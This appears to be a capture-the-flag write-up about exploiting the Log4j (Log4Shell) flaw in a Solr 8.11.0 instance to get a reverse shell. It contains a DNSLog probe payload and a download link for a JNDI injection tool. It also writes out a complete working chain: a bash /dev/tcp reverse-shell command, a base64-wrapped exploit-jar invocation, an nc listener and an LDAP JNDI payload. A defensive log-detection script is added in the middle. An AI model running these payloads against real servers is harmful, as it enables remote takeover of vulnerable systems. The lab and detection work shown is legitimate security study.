foreword
I ran into a problem in a competition: I found a log4j vulnerability, but I needed a reverse shell to get the flag. I tried several tools at first and could not get a shell back, until I came across an excellent blog post; many thanks to that master~ In this article I record the process of getting a reverse shell through log4j, for your reference only~
Go farther and see a brighter light
tool
I tested a few tools and found this one the easiest to use. You can download it directly from GitHub (the welk1n/JNDI-Injection-Exploit project; the release jar is JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar) or from my network disk:
Network disk link: https://pan.baidu.com/s/13cz9sZzMJcF9s1y7E7sOWw
Extraction code: qwer
Log4j Vulnerability Test
The challenge provides a Solr environment; the homepage shows version 8.11.0. Solr 8.11.0 still bundles Log4j 2.14.1, which is inside the range affected by CVE-2021-44228 (Solr fixed it in 8.11.1), so the version number alone already makes the vulnerability likely.
Obtain a domain name from DNSLog, then test whether the log4j vulnerability is really there through the Solr admin API. The value of the action parameter ends up in Solr's log, and that is where the lookup is evaluated. The payload is:
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jprd1u.dnslog.cn}
The nested ${sys:java.version} lookup is resolved first, so the DNS name that reaches DNSLog carries the target's Java version as its leftmost label. That is worth having: which of the JNDI payloads works later depends on the JDK version.
The DNSLog platform shows the callback, with the Java version in the subdomain. So far it can be inferred that the target environment has the log4j vulnerability. Note what the DNS callback proves: log4j performs JNDI lookups on logged input. It does not by itself prove code execution; that is what the next section tests.
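The same probe, seen from the defender's side. This is an added example and not part of the original write-up: it takes constructed Solr request-log lines (hosts, timestamps and the 203.0.113.10 attacker address are made up), undoes URL encoding and the common ${lower:j} / ${::-j} obfuscations, and counts the lines that still contain a ${jndi: lookup. It goes slightly beyond the post's own payload by also catching the encoded and obfuscated forms a real scanner would send.

```shell
#!/bin/sh
# Added example, not from the original post: detect Log4Shell probes such as the
# ${jndi:ldap://${sys:java.version}.<dnslog>} lookup in Solr request logs.
# Sample log lines are constructed; hosts, times and paths are made up.

# Single quotes are essential here: in double quotes the shell itself would
# try to expand ${jndi:...} and ${sys:java.version}.
SAMPLE_LOG='10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jprd1u.dnslog.cn} HTTP/1.1" 200
10.0.0.5 - - [11/Dec/2021:10:01:09 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200
10.0.0.7 - - [11/Dec/2021:10:02:30 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 200
10.0.0.9 - - [11/Dec/2021:10:03:11 +0000] "GET /solr/select?q=${${lower:j}ndi:rmi://203.0.113.10/x} HTTP/1.1" 200'

# Decode only the percent-escapes that matter for the lookup syntax
# ($ { } : /). A full URL decoder is better in production; this keeps the
# example portable across sed implementations.
url_decode() {
  sed -e 's/%24/$/g' -e 's/%7[Bb]/{/g' -e 's/%7[Dd]/}/g' \
      -e 's/%3[Aa]/:/g' -e 's/%2[Ff]/\//g'
}

# Collapse the two obfuscations seen most in the wild:
#   ${lower:j} / ${upper:j}  ->  j
#   ${::-j}                  ->  j
# After this, an obfuscated ${${lower:j}ndi: reads as ${jndi: again.
normalize() {
  url_decode | sed -E -e 's/[$][{](lower|upper):([^}])[}]/\2/g' \
                      -e 's/[$][{]::-([^}]*)[}]/\1/g'
}

# Normalize a single string passed as an argument (handy for one-off checks).
normalize_line() {
  printf '%s' "$1" | normalize
}

# Count the log lines on stdin that contain a JNDI lookup after normalization.
# grep -c prints 0 and exits 1 when nothing matches; "|| true" keeps the
# function usable under "set -e".
count_jndi_lookups() {
  normalize | grep -ciE '[$][{]jndi:' || true
}

# Demo: three of the four constructed lines are lookup attempts.
printf '%s\n' "$SAMPLE_LOG" | count_jndi_lookups
```

The normalization step is what makes the difference: a plain grep for `${jndi:` misses both the URL-encoded request and the `${${lower:j}ndi:` variant, and those are exactly the forms mass scanners moved to within days of the disclosure.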
Log4j reverse shell
Next you need the tool above and a server with a public IP that the target can reach. Upload the jar to the server, then base64-encode the reverse shell command. The port in the command must be the same one the listener will use (5555 below):
bash -i >& /dev/tcp/your_ip/5555 0>&1
Encode it with a base64 website or locally with the base64 command, then substitute the encoded string and the server's IP into the following command and run it on the server:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" -A "<server IP>"
The {echo,...}|{base64,-d}|{bash,-i} form is not decoration: the command string goes through Java's Runtime.exec, which splits it on whitespace, so everything after bash -c must contain no spaces. Bash brace expansion turns {echo,X} back into echo X on the target.
Now start the listener on the server; I use port 5555 here:
nc -lvp 5555
Both this port and the tool's LDAP port (1389 by default) must be reachable from the target, so check any firewall or security group before blaming the exploit.
The tool prints several JNDI URLs for different target environments (it labels them by JDK version and whether that JDK still trusts remote codebases). Pick the one matching the Java version revealed by the DNSLog test and send it in the same action parameter used above, for example:
${jndi:ldap://IP:1389/2u3m9p}
The path segment is the random token printed by the tool, so copy the exact URL from its output.
Test with the payload.
The shell comes back on the listener.
postscript
If you have any other questions, please leave a comment~